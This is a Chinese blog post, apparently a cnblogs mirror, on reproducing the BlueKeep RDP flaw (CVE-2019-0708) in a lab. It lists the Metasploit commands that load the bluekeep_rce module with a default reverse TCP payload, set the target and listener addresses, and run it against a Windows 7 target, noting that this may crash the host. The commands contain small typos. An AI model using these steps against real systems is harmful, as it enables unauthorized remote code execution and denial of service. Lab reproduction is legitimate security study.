zoukankan      html  css  js  c++  java
  • CVE-2019-0708—微软RDP远程桌面代码执行漏洞复现

    一 漏洞介绍:

    微软公司于美国当地时间2019年5月14日发布重要安全公告,其操作系统远程桌面(Remote Desktop Services),俗称的3389服务存在严重安全漏洞(编号CVE-2019-0708):攻击者在没有任何授权的情况下(不需要用户名和密码),,成功利用此漏洞的攻击者可以在目标系统上执行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

    二 漏洞影响范围:

    Windows 7,windows-Server 2008 R2和Windows Server 2008,windows-Xp,windows 2003

    三 漏洞复现:

    (1)     环境准备:

    a)      靶机:      我这里的靶机是Windows 7 64位 (6.1 版本7601)

    b)      攻击主机:Kali linux 

    (2)     漏洞攻击

    前提是windows 7需要开放了3389端口

    (3) 打开kali,输入 msfconsole

     (4) 搜索cve_2019_0708   输入: search cve_2019_0708

     (6)我们选择攻击的模块exploit进行攻击 输入:useexploit/windows/rdp/cve_2019_0708_bluekeep_rce

     默认载入反弹tcp木马

    (7)设置攻击的ip和本机的ip

    输入:

    set RHOTS 目标ip

    set LHOST 本机ip

    show options     //查看配置

     

     set target 1 //设置攻击者的架构

    (8)开始攻击:run

     攻击成功!

    注意:该攻击几率会导致目标主机蓝屏

  • 相关阅读:
    CentOS重启与关机
    VIM打开文件与保存文件
    sql Split
    JS获取URL参数
    C#后台调用公网接口(GET, POST)
    鼠标右击.exe的程序出现闪退(桌面重启)怎么办
    JS判断有无网络(移动端)
    TFS API : 四、工作项查询
    TFS API:三、TFS WorkItem添加和修改、保存
    TFS API:二、TFS 代码查询工作项
  • 原文地址:https://www.cnblogs.com/trevain/p/14281046.html
Copyright © 2011-2022 走看看